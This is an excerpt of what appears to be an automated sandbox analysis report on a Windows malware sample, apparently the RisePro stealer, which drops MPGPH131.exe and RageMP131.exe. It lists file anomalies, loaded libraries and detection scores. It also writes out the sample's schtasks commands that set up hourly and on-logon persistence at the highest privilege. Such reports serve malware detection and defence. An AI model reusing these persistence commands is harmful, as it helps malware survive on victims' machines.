Source: jHYZko.exe, 00000001.00000003.2022506492.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369326263.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4459917823.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.4459389526.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.4459782824.0000000001667000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORT
Source: MPGPH131.exe, 00000007.00000002.4459389526.00000000013AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORTz
Source: SciTE.exe.1.dr String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr String found in binary or memory: https://www.smartsharesystems.com/Morten
Installs a raw input device (often for capturing keystrokes)
Source: SciTE.exe.1.dr Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \ memstr_6cbc74d6-1

System Summary
barindex
PE file contains section with special chars
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name: pL~u
Source: RageMP131.exe.0.dr Static PE information: section name: pL~u
Source: MPGPH131.exe.0.dr Static PE information: section name: pL~u
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR
PE file has a writeable .text section
Source: jHYZko.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
PE file has nameless sections
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name:
Source: RageMP131.exe.0.dr Static PE information: section name:
Source: RageMP131.exe.0.dr Static PE information: section name:
Source: RageMP131.exe.0.dr Static PE information: section name:
Source: RageMP131.exe.0.dr Static PE information: section name:
Source: RageMP131.exe.0.dr Static PE information: section name:
Source: RageMP131.exe.0.dr Static PE information: section name:
Source: MPGPH131.exe.0.dr Static PE information: section name:
Source: MPGPH131.exe.0.dr Static PE information: section name:
Source: MPGPH131.exe.0.dr Static PE information: section name:
Source: MPGPH131.exe.0.dr Static PE information: section name:
Source: MPGPH131.exe.0.dr Static PE information: section name:
Source: MPGPH131.exe.0.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_0109991F 0_2_0109991F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_01031940 0_2_01031940
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_00FB2040 0_2_00FB2040
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_010AD1E1 0_2_010AD1E1
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_0108A800 0_2_0108A800
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_00FCA100 0_2_00FCA100
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_00FB22C0 0_2_00FB22C0
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_00FC42A0 0_2_00FC42A0
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_0103BBB0 0_2_0103BBB0
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_00FBAB50 0_2_00FBAB50
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_01034C20 0_2_01034C20
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_01090750 0_2_01090750
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_01093ED8 0_2_01093ED8
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_00FBA720 0_2_00FBA720
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_010206F0 0_2_010206F0
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA0B23 0_2_7ECA0B23
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA0000 0_2_7ECA0000
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Code function: 1_2_00E66076 1_2_00E66076
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Code function: 1_2_00E66D00 1_2_00E66D00
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_00572040 7_2_00572040
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_0064A800 7_2_0064A800
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_005F1940 7_2_005F1940
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_0058A100 7_2_0058A100
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_0065991F 7_2_0065991F
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_005722C0 7_2_005722C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_005842A0 7_2_005842A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_0057AB50 7_2_0057AB50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_005FBBB0 7_2_005FBBB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_005F4C20 7_2_005F4C20
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_005E06F0 7_2_005E06F0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_00653ED8 7_2_00653ED8
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_00650750 7_2_00650750
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_0057A720 7_2_0057A720
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_7F220B23 7_2_7F220B23
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_7F220000 7_2_7F220000
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_00572040 8_2_00572040
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_0064A800 8_2_0064A800
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_005F1940 8_2_005F1940
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_0058A100 8_2_0058A100
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_0065991F 8_2_0065991F
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_005722C0 8_2_005722C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_005842A0 8_2_005842A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_0057AB50 8_2_0057AB50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_005FBBB0 8_2_005FBBB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_005F4C20 8_2_005F4C20
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_005E06F0 8_2_005E06F0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_00653ED8 8_2_00653ED8
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_00650750 8_2_00650750
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_0057A720 8_2_0057A720
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_006BC717 8_2_006BC717
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_7F220B23 8_2_7F220B23
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_7F220000 8_2_7F220000
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\jHYZko.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
Found potential string decryption / allocating functions
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: String function: 0064D940 appears 46 times
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 1612
PE file contains executable resources (Code or Archives)
Source: MyProg.exe.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Sample file is different than original file name gathered from version info
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameAy3Info.exe0 vs Lisect_AVT_24003_G1A_89.exe
Source: Lisect_AVT_24003_G1A_89.exe Binary or memory string: OriginalFilenameAy3Info.exe0 vs Lisect_AVT_24003_G1A_89.exe
Uses 32bit PE files
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: jHYZko.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jHYZko.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jHYZko.exe.0.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: Section: ZLIB complexity 0.9996907199023861
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: Section: ZLIB complexity 0.9966460129310345
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: Section: ZLIB complexity 0.9948046875
Source: RageMP131.exe.0.dr Static PE information: Section: ZLIB complexity 0.9996907199023861
Source: RageMP131.exe.0.dr Static PE information: Section: ZLIB complexity 0.9966460129310345
Source: RageMP131.exe.0.dr Static PE information: Section: ZLIB complexity 0.9948046875
Source: MPGPH131.exe.0.dr Static PE information: Section: ZLIB complexity 0.9996907199023861
Source: MPGPH131.exe.0.dr Static PE information: Section: ZLIB complexity 0.9966460129310345
Source: MPGPH131.exe.0.dr Static PE information: Section: ZLIB complexity 0.9948046875
Source: classification engine Classification label: mal100.spre.troj.evad.winEXE@27/31@1/2
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Code function: 1_2_00E6119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 1_2_00E6119F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_00FBAB50 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,Process32Next,CloseHandle, 0_2_00FBAB50
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe File created: C:\Users\user\AppData\Local\RageMP131 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5592:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6484
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe File created: C:\Users\user\AppData\Local\Temp\jHYZko.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2b7051ed.bat" "
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: Lisect_AVT_24003_G1A_89.exe ReversingLabs: Detection: 94%
Source: Lisect_AVT_24003_G1A_89.exe Virustotal: Detection: 86%
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe File read: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe"
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Process created: C:\Users\user\AppData\Local\Temp\jHYZko.exe C:\Users\user\AppData\Local\Temp\jHYZko.exe
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 1612
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process created: C:\Users\user\AppData\Local\Temp\jHYZko.exe C:\Users\user\AppData\Local\Temp\jHYZko.exe
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2b7051ed.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Process created: C:\Users\user\AppData\Local\Temp\jHYZko.exe C:\Users\user\AppData\Local\Temp\jHYZko.exe Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process created: C:\Users\user\AppData\Local\Temp\jHYZko.exe C:\Users\user\AppData\Local\Temp\jHYZko.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2b7051ed.bat" "
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: version.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wldp.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: profapi.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: version.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wldp.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: profapi.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: wldp.dll Jump to behavior
